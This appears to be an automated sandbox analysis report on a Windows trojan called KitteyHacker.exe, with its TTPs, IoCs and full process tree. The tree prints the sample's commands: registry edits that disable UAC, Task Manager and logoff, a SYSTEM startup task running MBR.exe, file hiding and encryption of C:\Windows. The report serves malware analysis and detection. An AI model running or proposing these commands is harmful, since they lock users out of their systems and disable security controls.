hxxps://github[.]com/aadrians1/kitteyhacker/raw/main/KitteyHacker[.]exe

Resubmissions

29/08/2023, 12:27

230829-pmsdysfd8x 10

29/08/2023, 12:24

230829-ple28scd86 10

Analysis

max time kernel
82s
max time network
96s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
29/08/2023, 12:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/aadrians1/kitteyhacker/raw/main/KitteyHacker.exe

Score

10^/10

evasion trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
1532	KitteyHacker.exe
2940	KitteyHacker.exe
2708	SM.exe

Loads dropped DLL 4 IoCs

pid	Process
2940	KitteyHacker.exe
2940	KitteyHacker.exe
2940	KitteyHacker.exe
2940	KitteyHacker.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2312	schtasks.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
2616	taskkill.exe
1648	taskkill.exe
2828	taskkill.exe
1488	taskkill.exe
1520	taskkill.exe
2296	taskkill.exe
2660	taskkill.exe
1480	taskkill.exe
1532	taskkill.exe
2844	taskkill.exe
2572	taskkill.exe
2744	taskkill.exe
1104	taskkill.exe
2972	taskkill.exe
1388	taskkill.exe
2796	taskkill.exe
3044	taskkill.exe
2312	taskkill.exe
1748	taskkill.exe
2792	taskkill.exe
2948	taskkill.exe
3012	taskkill.exe
2560	taskkill.exe
1308	taskkill.exe
2384	taskkill.exe
1656	taskkill.exe
2008	taskkill.exe
2752	taskkill.exe
740	taskkill.exe
308	taskkill.exe
3032	taskkill.exe
1572	taskkill.exe
2052	taskkill.exe
2528	taskkill.exe
1704	taskkill.exe
1780	taskkill.exe
2352	taskkill.exe
2464	taskkill.exe
1868	taskkill.exe
2968	taskkill.exe
268	taskkill.exe
756	taskkill.exe
1480	taskkill.exe
3024	taskkill.exe
2224	taskkill.exe
592	taskkill.exe
892	taskkill.exe
760	taskkill.exe
924	taskkill.exe
2768	taskkill.exe
1872	taskkill.exe
1580	taskkill.exe
2892	taskkill.exe
2260	taskkill.exe
2192	taskkill.exe
2072	taskkill.exe
2280	taskkill.exe
1488	taskkill.exe
1880	taskkill.exe
596	taskkill.exe
1332	taskkill.exe
828	taskkill.exe
2600	taskkill.exe
2652	taskkill.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = d0255a2b74dad901	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 27 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{67AF7581-4667-11EE-86C4-6E9AB37CAD16} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003d000000900300001d020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2940	KitteyHacker.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2940	KitteyHacker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	2572	taskkill.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeDebugPrivilege	940	taskkill.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	2792	taskkill.exe
Token: SeShutdownPrivilege	1980	shutdown.exe
Token: SeRemoteShutdownPrivilege	1980	shutdown.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	2260	taskkill.exe
Token: SeDebugPrivilege	2136	taskkill.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeShutdownPrivilege	2160	shutdown.exe
Token: SeRemoteShutdownPrivilege	2160	shutdown.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	1684	taskkill.exe
Token: SeDebugPrivilege	2968	taskkill.exe
Token: SeDebugPrivilege	2796	taskkill.exe
Token: SeShutdownPrivilege	2864	shutdown.exe
Token: SeRemoteShutdownPrivilege	2864	shutdown.exe
Token: SeDebugPrivilege	2948	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeShutdownPrivilege	2156	shutdown.exe
Token: SeRemoteShutdownPrivilege	2156	shutdown.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	2768	taskkill.exe
Token: SeShutdownPrivilege	2384	shutdown.exe
Token: SeRemoteShutdownPrivilege	2384	shutdown.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	2604	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1384	taskkill.exe
Token: SeShutdownPrivilege	1804	shutdown.exe
Token: SeRemoteShutdownPrivilege	1804	shutdown.exe
Token: SeDebugPrivilege	2976	taskkill.exe
Token: SeDebugPrivilege	548	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	2268	taskkill.exe
Token: SeShutdownPrivilege	2336	shutdown.exe
Token: SeRemoteShutdownPrivilege	2336	shutdown.exe
Token: SeDebugPrivilege	876	taskkill.exe
Token: SeDebugPrivilege	2292	taskkill.exe
Token: SeDebugPrivilege	2612	taskkill.exe
Token: SeDebugPrivilege	2832	taskkill.exe
Token: SeShutdownPrivilege	2096	shutdown.exe
Token: SeRemoteShutdownPrivilege	2096	shutdown.exe
Token: SeDebugPrivilege	2824	taskkill.exe
Token: SeDebugPrivilege	2708	taskkill.exe
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	3068	taskkill.exe
Token: SeShutdownPrivilege	2784	shutdown.exe
Token: SeRemoteShutdownPrivilege	2784	shutdown.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeShutdownPrivilege	1488	shutdown.exe
Token: SeRemoteShutdownPrivilege	1488	shutdown.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	1836	taskkill.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1500	iexplore.exe
1500	iexplore.exe
1044	efsui.exe
1044	efsui.exe
1044	efsui.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1044	efsui.exe
1044	efsui.exe
1044	efsui.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1500	iexplore.exe
1500	iexplore.exe
2220	IEXPLORE.EXE
2220	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1500 wrote to memory of 2220	1500	iexplore.exe	28
PID 1500 wrote to memory of 2220	1500	iexplore.exe	28
PID 1500 wrote to memory of 2220	1500	iexplore.exe	28
PID 1500 wrote to memory of 2220	1500	iexplore.exe	28
PID 1532 wrote to memory of 2016	1532	KitteyHacker.exe	32
PID 1532 wrote to memory of 2016	1532	KitteyHacker.exe	32
PID 1532 wrote to memory of 2016	1532	KitteyHacker.exe	32
PID 1532 wrote to memory of 2016	1532	KitteyHacker.exe	32
PID 2016 wrote to memory of 2168	2016	cmd.exe	34
PID 2016 wrote to memory of 2168	2016	cmd.exe	34
PID 2016 wrote to memory of 2168	2016	cmd.exe	34
PID 2016 wrote to memory of 1908	2016	cmd.exe	35
PID 2016 wrote to memory of 1908	2016	cmd.exe	35
PID 2016 wrote to memory of 1908	2016	cmd.exe	35
PID 2016 wrote to memory of 2760	2016	cmd.exe	36
PID 2016 wrote to memory of 2760	2016	cmd.exe	36
PID 2016 wrote to memory of 2760	2016	cmd.exe	36
PID 2016 wrote to memory of 2236	2016	cmd.exe	40
PID 2016 wrote to memory of 2236	2016	cmd.exe	40
PID 2016 wrote to memory of 2236	2016	cmd.exe	40
PID 2016 wrote to memory of 2560	2016	cmd.exe	41
PID 2016 wrote to memory of 2560	2016	cmd.exe	41
PID 2016 wrote to memory of 2560	2016	cmd.exe	41
PID 2016 wrote to memory of 736	2016	cmd.exe	42
PID 2016 wrote to memory of 736	2016	cmd.exe	42
PID 2016 wrote to memory of 736	2016	cmd.exe	42
PID 2016 wrote to memory of 2604	2016	cmd.exe	43
PID 2016 wrote to memory of 2604	2016	cmd.exe	43
PID 2016 wrote to memory of 2604	2016	cmd.exe	43
PID 2016 wrote to memory of 2432	2016	cmd.exe	44
PID 2016 wrote to memory of 2432	2016	cmd.exe	44
PID 2016 wrote to memory of 2432	2016	cmd.exe	44
PID 2016 wrote to memory of 652	2016	cmd.exe	45
PID 2016 wrote to memory of 652	2016	cmd.exe	45
PID 2016 wrote to memory of 652	2016	cmd.exe	45
PID 2016 wrote to memory of 828	2016	cmd.exe	46
PID 2016 wrote to memory of 828	2016	cmd.exe	46
PID 2016 wrote to memory of 828	2016	cmd.exe	46
PID 2016 wrote to memory of 2132	2016	cmd.exe	47
PID 2016 wrote to memory of 2132	2016	cmd.exe	47
PID 2016 wrote to memory of 2132	2016	cmd.exe	47
PID 2016 wrote to memory of 3056	2016	cmd.exe	48
PID 2016 wrote to memory of 3056	2016	cmd.exe	48
PID 2016 wrote to memory of 3056	2016	cmd.exe	48
PID 2016 wrote to memory of 1796	2016	cmd.exe	49
PID 2016 wrote to memory of 1796	2016	cmd.exe	49
PID 2016 wrote to memory of 1796	2016	cmd.exe	49
PID 2016 wrote to memory of 1924	2016	cmd.exe	50
PID 2016 wrote to memory of 1924	2016	cmd.exe	50
PID 2016 wrote to memory of 1924	2016	cmd.exe	50
PID 2016 wrote to memory of 956	2016	cmd.exe	51
PID 2016 wrote to memory of 956	2016	cmd.exe	51
PID 2016 wrote to memory of 956	2016	cmd.exe	51
PID 2016 wrote to memory of 1804	2016	cmd.exe	52
PID 2016 wrote to memory of 1804	2016	cmd.exe	52
PID 2016 wrote to memory of 1804	2016	cmd.exe	52
PID 2016 wrote to memory of 1648	2016	cmd.exe	53
PID 2016 wrote to memory of 1648	2016	cmd.exe	53
PID 2016 wrote to memory of 1648	2016	cmd.exe	53
PID 2016 wrote to memory of 2316	2016	cmd.exe	54
PID 2016 wrote to memory of 2316	2016	cmd.exe	54
PID 2016 wrote to memory of 2316	2016	cmd.exe	54
PID 2016 wrote to memory of 1856	2016	cmd.exe	55
PID 2016 wrote to memory of 1856	2016	cmd.exe	55

Views/modifies file attributes 1 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2168	attrib.exe
1648	attrib.exe
1856	attrib.exe
1860	attrib.exe
2092	attrib.exe
1804	attrib.exe
2316	attrib.exe
1980	attrib.exe
904	attrib.exe
2424	attrib.exe
1884	attrib.exe
2452	attrib.exe
2324	attrib.exe
548	attrib.exe
676	attrib.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/aadrians1/kitteyhacker/raw/main/KitteyHacker.exe
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2220

C:\Users\Admin\Downloads\KitteyHacker.exe
"C:\Users\Admin\Downloads\KitteyHacker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1532
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\C9B6.bat C:\Users\Admin\Downloads\KitteyHacker.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "C:\Users\Admin\AppData\Local\Temp\C9B5.tmp"
    3⤵
    - Views/modifies file attributes
    PID:2168
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "C:\Users\Admin\AppData\Local\Temp\C9B5.tmp"
    3⤵
    PID:1908
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "C:\Users\Admin\Downloads\KitteyHacker.exe"
    3⤵
    PID:2760
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E C:\Users\Admin\Downloads\KitteyHacker.exe
    3⤵
    PID:2236
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "KitteyHacker.exe"
    3⤵
    PID:2560
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "php5ts.dll"
    3⤵
    PID:736
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "squall.dll"
    3⤵
    PID:2604
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "ext\php_squall.dll"
    3⤵
    PID:2432
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "ext"
    3⤵
    PID:652
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "KitteyHacker.mp3"
    3⤵
    PID:828
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "Kitty.mp3"
    3⤵
    PID:2132
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "Protogent.mp3"
    3⤵
    PID:3056
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "SM.exe"
    3⤵
    PID:1796
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "KHD.exe"
    3⤵
    PID:1924
- - C:\Windows\System32\cipher.exe
    C:\Windows\System32\CIPHER /E "C:\Windows"
    3⤵
    PID:956
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "C:\Users\Admin\Downloads\KitteyHacker.exe"
    3⤵
    - Views/modifies file attributes
    PID:1804
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s C:\Users\Admin\Downloads\KitteyHacker.exe
    3⤵
    - Views/modifies file attributes
    PID:1648
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "KitteyHacker.exe"
    3⤵
    - Views/modifies file attributes
    PID:2316
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "php5ts.dll"
    3⤵
    - Views/modifies file attributes
    PID:1856
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "squall.dll"
    3⤵
    - Views/modifies file attributes
    PID:2424
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "ext\php_squall.dll"
    3⤵
    - Views/modifies file attributes
    PID:1860
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "ext"
    3⤵
    - Views/modifies file attributes
    PID:1980
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "KitteyHacker.mp3"
    3⤵
    - Views/modifies file attributes
    PID:2092
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "Kitty.mp3"
    3⤵
    - Views/modifies file attributes
    PID:1884
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "Protogent.mp3"
    3⤵
    - Views/modifies file attributes
    PID:904
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "MBR.exe"
    3⤵
    - Views/modifies file attributes
    PID:2452
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "SM.exe"
    3⤵
    - Views/modifies file attributes
    PID:548
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "KHD.exe"
    3⤵
    - Views/modifies file attributes
    PID:676
- - C:\Windows\System32\attrib.exe
    C:\Windows\System32\attrib +h +s "C:\Windows"
    3⤵
    - Views/modifies file attributes
    PID:2324
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:2008
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\SchTasks /Create /TN KitteyHacker /ru SYSTEM /SC ONSTART /TR ""C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\MBR.exe"" /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:2312
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /F
    3⤵
    PID:812
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /F
    3⤵
    PID:2136
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /F
    3⤵
    PID:984
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /F
    3⤵
    PID:2336
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /F
    3⤵
    PID:2248
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DisableCAD /t REG_DWORD /d 1 /F
    3⤵
    PID:1656
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /F
    3⤵
    - UAC bypass
    PID:664
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /F
    3⤵
    PID:272
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /F
    3⤵
    PID:2128
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /F
    3⤵
    PID:1496
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /F
    3⤵
    PID:1740
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /F
    3⤵
    PID:2160
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /F
    3⤵
    PID:2580
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /F
    3⤵
    PID:2376
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /F
    3⤵
    PID:2120
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /F
    3⤵
    PID:2296
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /F
    3⤵
    PID:1724
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyGames /t REG_DWORD /d 1 /F
    3⤵
    PID:1544
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /F
    3⤵
    PID:1692
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /F
    3⤵
    PID:2152
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /F
    3⤵
    PID:596
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /F
    3⤵
    PID:1684
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /F
    3⤵
    PID:2500
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocs /t REG_DWORD /d 0 /F
    3⤵
    PID:2800
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowDownloads /t REG_DWORD /d 0 /F
    3⤵
    PID:2380
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyGames /t REG_DWORD /d 0 /F
    3⤵
    PID:2832
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /F
    3⤵
    PID:2820
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /F
    3⤵
    PID:2968
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPics /t REG_DWORD /d 0 /F
    3⤵
    PID:2960
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecordedTV /t REG_DWORD /d 0 /F
    3⤵
    PID:2964
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowVideos /t REG_DWORD /d 0 /F
    3⤵
    PID:2972
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSetProgramAccessAndDefaults /t REG_DWORD /d 0 /F
    3⤵
    PID:2844
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowPrinters /t REG_DWORD /d 0 /F
    3⤵
    PID:2848
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_EnableDragDrop /t REG_DWORD /d 0 /F
    3⤵
    PID:2796
